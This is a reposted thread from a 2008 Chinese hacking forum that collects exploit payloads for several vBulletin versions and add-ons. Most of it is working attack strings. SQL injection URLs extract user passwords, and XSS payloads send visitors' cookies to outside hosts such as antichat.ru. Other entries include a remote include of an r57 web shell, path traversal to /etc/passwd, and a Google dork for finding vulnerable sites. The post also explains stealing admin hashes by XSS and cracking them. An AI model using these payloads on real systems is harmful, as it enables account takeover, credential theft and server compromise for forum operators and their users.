注册
登录
论坛
搜索
插件
默认风格
默认风格_6hOY
D Dark
greenwall
jeans
fashion
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
【3.A.S.T】网络安全爱好者
»
技术交流
» [转载]vBulletin Hack
返回列表
发帖
faye
发短消息
加为好友
faye
当前离线
UID
1230
帖子
110
精华
0
积分
282
威望
450
金钱
344
阅读权限
30
在线时间
1 小时
注册时间
2008-7-16
最后登录
2009-2-13
3.A.S.T中尉
帖子
110
积分
282
威望
450
金钱
344
在线时间
1 小时
1
楼
跳转到
»
正序看帖
打印
字体大小:
t
T
发表于 2008-7-20 23:26
|
只看该作者
[转载]vBulletin Hack
Hack
,
vBulletin
[转载]vBulletin Hack
2.3.* - SQL injection
Quote:
www.strona.com/forumpath/calenda ... edit&eventid=14
union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
2.*.* - XSS
Quote:[E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));
vBulletin 3.0
混世魔王:收集:vBulletin 的注入漏洞很少,国外对付VBB的办法是XSS到admin 的hash,然后用vBulletin Hash cracker2.0 破解.
3.0.0 - XSS
Quote:
www.strona.com/forumpath//search ... wposts=0&query=
<script>im g = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>
3.0-3.0.4
Quote:
www.strona.com/forumpath/forumdisplay.php?GLOBALS
[]=1&f=2&comma=".system
3.0.3–3.0.9 XSS
Quote:<body onLoad=img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;>
3.0.9 and 3.5.4 - XSS
Quote:
www.strona.com/forumpath/newthre ... ect=1234&WYSIWY
G_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&post hash=c8d3fe38b082b6d3381cbee17f1f1aca&poststarttim e='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4% E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3 &postpoll=yes&polloptions=1234&openclose=1&stickun stick=
1&iconid=0
vBulletin 3.5
Quote:TITLE:--------->Test<script>img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>
BODY:---------->Oboj?tnie
OTHER OPTIONS:->Oboj?tnie
3.5.3 - XSS
Quote:
www.strona.com/forumpath/profile.php?do=editpassword
pass:Twoje has?o
email:
jakis@email.com
”><script>img = new Image(); img.src = "http://strona.pl/s.jpg?"+document.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
www.strona.com/forumpath/sendmessage.php?do=mailmember&u=
{your id}
3.5.4
Quote:
www.strona.com/forumpath/install/upgrade_301.php?step=SomeWord
3.5.4 - XSS
Quote:
www.strona.com/forumpath/inlinem ... l=lala2%0d%0aConten
t-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a
Modu?y do vbulletin
vBug Tracker 3.5.1 - XSS
Quote:
www.strona.com/forumpath/vbugs.p ... ug_typeid=0&vbu
g_statusid=0&vbug_severityid=0&vbug_versionid=0&as signment=0&sortfield=lastedit&sortorder=%22%3Cscri pt%3Eimg= new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E
ImpEx 1.74
Quote:
www.strona.com/forumpath/impex/I ... wnload/r57shell.txt
www.strona.com/forumpath/impex/I ... ../../../etc/passwd
ibProArcade 2.x - SQL injection
Quote:
www.strona.com/forumpath/index.p ... =report&user=-1
union select password from user where userid=[any_user]
google dork:
Code:
"Powered by vBulletin Version [numer_version]"
收藏
分享
返回列表
【 新 手 入 门 】
初入江湖
有问必答
软件交流
程序设计
黑客播报
操作系统
Windows专区
Unix 专区
【 技 术 交 流 】
原创专区
QQ技巧
反黑知识
网站建设
教程发布
技术交流
免杀技术
0day发布
专题归类
私服技术
【 论 坛 水 区 】
被黑站点
激情灌水
极品贴图
开心乐园
影音专区
广告专区
【 论 坛 管 理 】
新人报到
论坛管理
勋章申请
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
全国地图
@@@ 加入本站会员 一个月月赚1200+的秘密@@@